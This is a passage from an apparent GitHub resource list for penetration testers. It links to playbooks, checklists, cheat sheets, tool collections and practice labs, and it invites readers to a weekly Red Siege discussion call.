Pentest](https://bitvijays.github.io/index.html) **6** Sdcampbell | [Internal Network Penetration Test Playbook ](https://github.com/sdcampbell/Internal-Pentest-Playbook) **7** Red team/Bug Bounty Security Referances | [by s0cm0nkey](https://s0cm0nkey.gitbook.io/s0cm0nkeys-security-reference-guide/web-app-hacking) **8** enaqx | [Awsome Pentest](https://github.com/enaqx/awesome-pentest) **9** Wordlists | [All Wordlists](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/Wordlists.md) Author | Pentesting Checklist -- | -- **1** | [Pentesting Checklist](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/PentestingChecklist) Author | Pentesting Mindmap -- | -- **1** | [Internal-Network-Pentest-MindMap](https://github.com/sdcampbell/Internal-Network-Pentest-MindMap) Author | Pentesting Cheetsheet -- | -- **1** | [Pentesting Cheetsheet](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/cheetsheets) **2** | [hausec - pentesting cheetsheet](https://hausec.com/pentesting-cheatsheet/) **3** | [ired - offensive-security-cheetsheets](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets) **4** | [anhtai - beginner friendly penetsting cheetsheet](https://anhtai.me/pentesting-cheatsheet/) **5** | [coreb1t Collection of the cheat sheets useful for pentesting:](https://github.com/coreb1t/awesome-pentest-cheat-sheets) **6** | [Randomkeystrokes - Wifi Pentesting Command Cheatsheet](https://randomkeystrokes.com/2016/07/01/wifi-pentesting-cheatsheet/) **7** | [NEED TO UPDATE - pentesting-with-powershell-in-six-steps](https://periciacomputacional.com/pentesting-with-powershell-in-six-steps/) Author | Pentesting Tools -- | -- **1** S3cur3Th1sSh1t | [Pen Testing Tools ](https://github.com/S3cur3Th1sSh1t/Pentest-Tools) Author | Pentesting Labs -- | -- **1** | [Practice Labs for Pentesting ](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Pentesting_for_Researchers/PTplatform.md) ## [Oh-My-Zsh-theme-for-pentesters which includes the date, time, and IP address for pentest logging.](https://github.com/sdcampbell/lpha3cho-Oh-My-Zsh-theme-for-pentesters) ## ASK Questions related to Pentesting -- | -- **1** | [Wednesday Offensive - REDSIEGE] 30 Minutes of conversations with people around the industry with Tim Medin and the Red Siege Team. Open to everyone, questions welcome! Join us Wednesdays in an open conversation live video chat format. No Slides, Just talk! Topics will vary depending on guests, but conversations are open to everyone. You only need to register the first time and you're set for all future Wednesday Offensive conversations. [Zoom Meeting ID,passcode & link:842 7796 4949, 957717](https://us02web.zoom.us/w/84277964949?tk=c9Sq_ZUmgkIXWjmc9IFvz5JElMlmba3ll1gnawypC-8.DQMAAAATn1uwlRZTVWhXZy1HZVFwQ1k2VHRPMVNMU1FRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&pwd=LTWU2D9UAWMiSBE2gNF8yk8k8S95SJ9bAT) Aug 10, 2022 12:30 PM ![web pentesting upderstand](https://user-images.githubusercontent.com/25515871/179118116-d376b928-f564-435b-a8c5-f38115aeb9da.png)